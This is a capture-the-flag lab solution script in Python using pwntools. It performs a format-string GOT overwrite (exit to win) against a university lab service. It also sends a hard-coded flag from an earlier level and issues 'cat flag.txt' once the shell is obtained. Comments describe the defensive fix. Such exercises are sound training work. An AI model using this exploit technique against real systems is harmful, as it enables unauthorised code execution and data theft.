hacklab/4/level10/test.py
2026-02-02 16:05:13 +01:00


#!/usr/bin/env python3
from pwn import *
# Lab solution script for level10: uses a format-string write to redirect
# exit@GOT to win() in the target binary, then hands the session to the user.
#
# Defensive takeaway for the target program: the write is only possible when
# user input is used as the format string itself and the GOT is still writable.
# Passing input as an argument (printf("%s", buf)) removes the primitive, and
# linking with full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only.

# Parse the local copy of the binary so symbol and GOT addresses can be looked up.
elf = ELF('./level10')
# Addresses: the GOT slot that exit() is resolved through, and the win() function.
# NOTE(review): these are the addresses as stored in the ELF file; they match the
# running process only if the binary is not position-independent. Confirm.
exit_got = elf.got['exit']
win_addr = elf.symbols['win']
print("exit got: ", hex(exit_got))
print("win : ", hex(win_addr))
# Build a fmtstr payload that rewrites exit@GOT -> win()
# NOTE(review): an earlier comment here described write_size='short' (%hn, 2-byte
# writes), but the fmtstr_payload() call below passes no write_size, so the
# pwntools default is what is actually used.
# Disabled leftovers from local testing (a loop header, a banner print and a
# local process() target); kept as found:
#for i in range(1,30):
#print("##################### ", i)
#p = process(elf.path)
# Connect to the remote lab service instead of a local process.
p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
# First line sent to the service.
# NOTE(review): this is a secret hard-coded in source; it looks like a flag from
# an earlier level used as the entry password here. Confirm, and prefer loading
# it from the environment or a file that is not committed.
payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
p.sendline(payload.encode())
# Reset the pwntools context and select amd64 before building the payload, so
# the addresses are packed as 64-bit values.
context.clear(arch = 'amd64')
# offset=8 is the position of the first controlled format argument.
# NOTE(review): the value 8 is specific to this binary and is not derived
# anywhere in this script. Confirm how it was determined.
payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
# Wait for the prompt, then send the payload and log it as hex.
p.recvuntil("talk about?".encode())
p.sendline(payload)
print("send: ", payload.hex())
res = p.recvline()
print("got: ", res)
# Hand the connection over to the terminal; this blocks until the user leaves
# interactive mode.
p.interactive()
# Everything below runs only after interactive() returns.
# NOTE(review): if the connection is closed by then, recvline() will fail;
# these lines look like leftovers from a non-interactive variant.
res = p.recvline()
print("got: ", res)
# NOTE(review): a str is passed here while every other send uses bytes;
# pwntools warns about text passed where bytes are expected.
p.sendline("cat flag.txt")
print("send cat")
res = p.recvline()
print("got: ", res)